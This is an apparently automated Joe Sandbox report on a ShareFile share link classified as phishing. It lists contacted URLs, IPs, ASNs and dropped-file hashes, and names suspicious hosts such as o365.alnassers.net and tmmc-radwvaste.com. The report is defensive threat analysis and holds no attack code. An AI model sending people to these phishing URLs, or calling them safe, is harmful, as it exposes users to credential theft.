                                                                                                                high
                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/main.cssfalse
                                                                                                                  high
                                                                                                                  https://bam.nr-data.net/jserrors/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=90998&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0false
                                                                                                                    high
                                                                                                                    https://bam.nr-data.net/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=30200&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0&be=1223&fe=29207&dc=4653&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1730835358296,%22n%22:0,%22f%22:3,%22dn%22:46,%22dne%22:61,%22c%22:61,%22s%22:61,%22ce%22:897,%22rq%22:897,%22rp%22:1193,%22rpe%22:1366,%22dl%22:1198,%22di%22:4565,%22ds%22:4652,%22de%22:4653,%22dc%22:29206,%22l%22:29206,%22le%22:29209%7D,%22navigation%22:%7B%7D%7D&fp=1888&fcp=2388&jsonp=NREUM.setTokenfalse
                                                                                                                      high
                                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/index.jsfalse
                                                                                                                        high
                                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.jsfalse
                                                                                                                          high
                                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/main.cssfalse
                                                                                                                            high
                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.jsfalse
                                                                                                                              high
                                                                                                                              https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/verifyfalse
                                                                                                                                high
                                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/main.cssfalse
                                                                                                                                  high
                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/index.jsfalse
                                                                                                                                    high
                                                                                                                                    https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/telemetryfalse
                                                                                                                                      high
                                                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/main.cssfalse
                                                                                                                                        high
                                                                                                                                        https://bam.nr-data.net/events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=40206&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0false
                                                                                                                                          high
                                                                                                                                          https://a.nel.cloudflare.com/report/v4?s=6ashyvJscPM5GNzQVyKKSpsfOrcooIF3q7UoH0y2YPVkJC0XMkqiLjBpURrNe8%2Bnsam7%2Fwd3aFWEdtitfVKWJSBdOUsrs2UPp%2B233WlR%2BAik0RXujDzC01u54JubB2GedOKzt59Afalse
                                                                                                                                            high
                                                                                                                                            https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.jsfalse
                                                                                                                                              high
                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/main.cssfalse
                                                                                                                                                high
                                                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/main.cssfalse
                                                                                                                                                  high
                                                                                                                                                  https://averellharriman.sharefile.com/css/spinner.cssfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/main.cssfalse
                                                                                                                                                    high
                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/main.cssfalse
                                                                                                                                                      high
                                                                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/main.cssfalse
                                                                                                                                                        high
                                                                                                                                                        https://o365.alnassers.net/false
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/main.cssfalse
                                                                                                                                                          high
                                                                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.jsfalse
                                                                                                                                                            high
                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/index.jsfalse
                                                                                                                                                              high
                                                                                                                                                              https://averellharriman.sharefile.com/bundles/5be3ba1b444ac539eaf5.jsfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://averellharriman.sharefile.com/bundles/c3b78c86faf44765071f.jsfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://averellharriman.sharefile.com/bundles/d178f6eceb0126b1e292.jsfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/index.jsfalse
                                                                                                                                                                high
                                                                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-workflows-pilet/0.120.9/package/dist/index.jsfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/main.cssfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://bam.nr-data.net/events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=91000&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0false
                                                                                                                                                                      high
                                                                                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/main.cssfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://averellharriman.sf-api.com/sf/v3/Items/ContentViewerfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/main.cssfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/index.jsfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://citrix-sharefile-content.customer.pendo.io/guide.-323232.1622565221517.cssfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.jsfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/index.jsfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://averellharriman.sharefile.com/bundles/2efeefafc2bb68a97d33.jsfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/main.cssfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://averellharriman.sharefile.com/bundles/ba7dfd1a6326f1b75478.jsfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/main.cssfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/main.cssfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://averellharriman.sharefile.com/bundles/1c992ae0c14e95098d9a.jsfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0false
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/index.jsfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://averellharriman.sf-api.com/sf/v3/Accounts/Brandingfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://averellharriman.sharefile.com/bundles/7ba6967109e88a8ecd8d.jsfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://averellharriman.sharefile.com/manifest.jsonfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-request-list-pilet/1.10.1/package/dist/index.jsfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/main.cssfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/main.cssfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://averellharriman.sharefile.com/css/sharefilebrand/sf-spinner.svgfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/index.jsfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/index.jsfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://api.ipify.org/?format=jsonfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://sf-cv.sharefile.com/service/contentviewer/document/sessionurlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0true
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.jsfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://averellharriman.sharefile.com/bundles/5626aad50bfaf67fedc0.jsfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                              https://developers.cloudflare.com/r2/data-access/public-buckets/chromecache_251.1.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://agent.pendo.io/licenseschromecache_270.1.dr, chromecache_211.1.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://amazon.com/chromecache_277.1.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://tmmc-radwvaste.com/200/#chromecache_277.1.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://citrix-sharefile-content.customer.pendo.io/agent/static/74b07336-7560-45fc-7cd1-95032a784d52chromecache_270.1.dr, chromecache_211.1.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      151.101.130.137
                                                                                                                                                                                                                      code.jquery.comUnited States
                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                      13.248.193.251
                                                                                                                                                                                                                      averellharriman.sharefile.comUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      147.79.74.176
                                                                                                                                                                                                                      o365.alnassers.netUnited States
                                                                                                                                                                                                                      208485EKSENBILISIMTRfalse
                                                                                                                                                                                                                      54.231.233.161
                                                                                                                                                                                                                      s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      172.66.0.235
                                                                                                                                                                                                                      pub-10305130932840cc9846324aa165bbf7.r2.devUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                      35.190.80.1
                                                                                                                                                                                                                      a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                      162.247.243.39
                                                                                                                                                                                                                      js-agent.newrelic.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      104.26.13.205
                                                                                                                                                                                                                      api.ipify.orgUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      147.182.200.48
                                                                                                                                                                                                                      tmmc-radwvaste.comUnited States
                                                                                                                                                                                                                      27555BV-PUBLIC-ASNUSfalse
                                                                                                                                                                                                                      52.206.112.129
                                                                                                                                                                                                                      events.launchdarkly.comUnited States
                                                                                                                                                                                                                      14618AMAZON-AESUSfalse
                                                                                                                                                                                                                      18.245.175.33
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      13.224.189.115
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      34.107.204.85
                                                                                                                                                                                                                      85.204.107.34.bc.googleusercontent.comUnited States
                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                      13.32.121.3
                                                                                                                                                                                                                      0093b71e39a6.us-east-1.sdk.awswaf.comUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      18.239.18.50
                                                                                                                                                                                                                      0093b71e39a6.11de9b12.us-east-1.token.awswaf.comUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      142.250.185.132
                                                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                      34.111.138.51
                                                                                                                                                                                                                      51.138.111.34.bc.googleusercontent.comUnited States
                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                      13.227.219.30
                                                                                                                                                                                                                      piletfeed-cdn.sharefile.ioUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      3.33.222.159
                                                                                                                                                                                                                      sf-renderx-us-east-1.sharefile.comUnited States
                                                                                                                                                                                                                      8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                                                      162.247.243.29
                                                                                                                                                                                                                      fastly-tls12-bam.nr-data.netUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      142.250.186.100
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                      18.245.175.100
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      76.223.1.166
                                                                                                                                                                                                                      sf-cv.sharefile.comUnited States
                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                      34.120.195.249
                                                                                                                                                                                                                      o49063.ingest.sentry.ioUnited States
                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                      104.17.25.14
                                                                                                                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                      192.168.2.17
                                                                                                                                                                                                                      192.168.2.16
                                                                                                                                                                                                                      192.168.2.18
                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1549641
                                                                                                                                                                                                                      Start date and time:2024-11-05 20:35:20 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 4m 16s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                      Sample URL:https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:20
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal64.phis.win@19/171@52/29
                                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, TextInputHost.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.67, 173.194.76.84, 142.250.185.110, 34.104.35.123, 217.20.57.35, 151.101.130.217, 151.101.194.217, 151.101.2.217, 151.101.66.217, 192.229.221.95, 199.232.210.172, 216.58.212.170, 142.250.185.106, 142.250.186.106, 142.250.184.202, 142.250.184.234, 142.250.185.138, 216.58.206.74, 142.250.186.74, 142.250.186.138, 216.58.206.42, 172.217.16.138, 142.250.185.202, 142.250.185.170, 142.250.185.74, 172.217.16.202, 172.217.18.10, 142.250.185.131, 142.250.181.238, 142.250.184.206
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, evoke-windowsservices-tas.msedge.net, update.googleapis.com, clients.l.google.com, c3.shared.global.fastly.net
                                                                                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                      • VT rate limit hit for: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      No simulations
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 5 18:35:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                      Entropy (8bit):3.989364587903468
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:8KE1lduTn7OTNH/0idAKZdA1JehwiZUklqehVy+3:8n1GWTR+2y
                                                                                                                                                                                                                      MD5:D2C7451C91C6D7114038E306587BAABD
                                                                                                                                                                                                                      SHA1:05EF41D5121C725775A79DA8181168A05DF27481
                                                                                                                                                                                                                      SHA-256:A6C859149292079E485FB3A5743684B471AE6D4E10928B2648CD95CBD8C2F884
                                                                                                                                                                                                                      SHA-512:B73ECB58911D664C8EE9A0A3BD4FCCB763BC4B94C13448C63EAC412E2D3E681E581E8E38DE63496490667F0DE8B131508D9F2CA8A2689892005492277FA7A5EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....4|!./......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IeYq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VeY}.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VeY}............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VeY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 5 18:35:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                      Entropy (8bit):4.006746187009353
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:8H1lduTn7OTNH/0idAKZdA10eh/iZUkAQkqehmy+2:8H1GWTRM9Qry
                                                                                                                                                                                                                      MD5:6347621F965FFEC8CF02CA25AECFB3F4
                                                                                                                                                                                                                      SHA1:C20E791D77D3369A8FE2A396382C5A40D45FD7DD
                                                                                                                                                                                                                      SHA-256:23DA0831F8CE041EF72839E62CE8406028899E783776737EF53673DFB6E50CE6
                                                                                                                                                                                                                      SHA-512:C3FF698BCE768F0183B673A68FF156FD670EB6CD5887514185A52E810EFA80835D237819932DE510CBBE4552D35EC2B30FFF1D616815C9C6DAC24484C4FDB73C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......../......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IeYq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VeY}.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VeY}............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VeY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2693
                                                                                                                                                                                                                      Entropy (8bit):4.014674085555631
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:8elduTn7OTjH/0idAKZdA14tIeh7sFiZUkmgqeh7sMy+BX:8eGWT7Unyy
                                                                                                                                                                                                                      MD5:232E8613462962B7C23DD3926BBFF2AD
                                                                                                                                                                                                                      SHA1:0DFC031B664E9BAA7D3D123E3D4930CC6D1D4FFD
                                                                                                                                                                                                                      SHA-256:66FC29F61E5F64E55F6868CB61874F862178007CBA8C53C2D385609C2E929CA3
                                                                                                                                                                                                                      SHA-512:94252193D10A06F316CF8F21E7D6E0ED4B3E6E5B97FFC29CC9FF3D97DD2197672F9A9080A2AB711D1FBE93CBCAD129ED859BC7F673ACA6FA654B306113A8F4BE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IeYq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VeY}.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VeY}............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 5 18:35:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2681
                                                                                                                                                                                                                      Entropy (8bit):4.003444661732317
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:8K1lduTn7OTNH/0idAKZdA1behDiZUkwqeh6y+R:8K1GWTRnUy
                                                                                                                                                                                                                      MD5:962BAF02A43926E0C202C9F5F118F5C5
                                                                                                                                                                                                                      SHA1:8BB3D36CBDABC8C4BD4307B006ACFC4845ADD350
                                                                                                                                                                                                                      SHA-256:C9D2BBA535847DFFBA792EA30346B05B839CFCCB0341B527A09C45B381862C23
                                                                                                                                                                                                                      SHA-512:0313AE1B0314A6F9E62F17FEAA609D3101A874B29511D6F85FD1103F0BA73E6B8A873004D3D12C02E710FC03A1144C58595E5C08B0B04ACF5241E23ECD35A6DE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
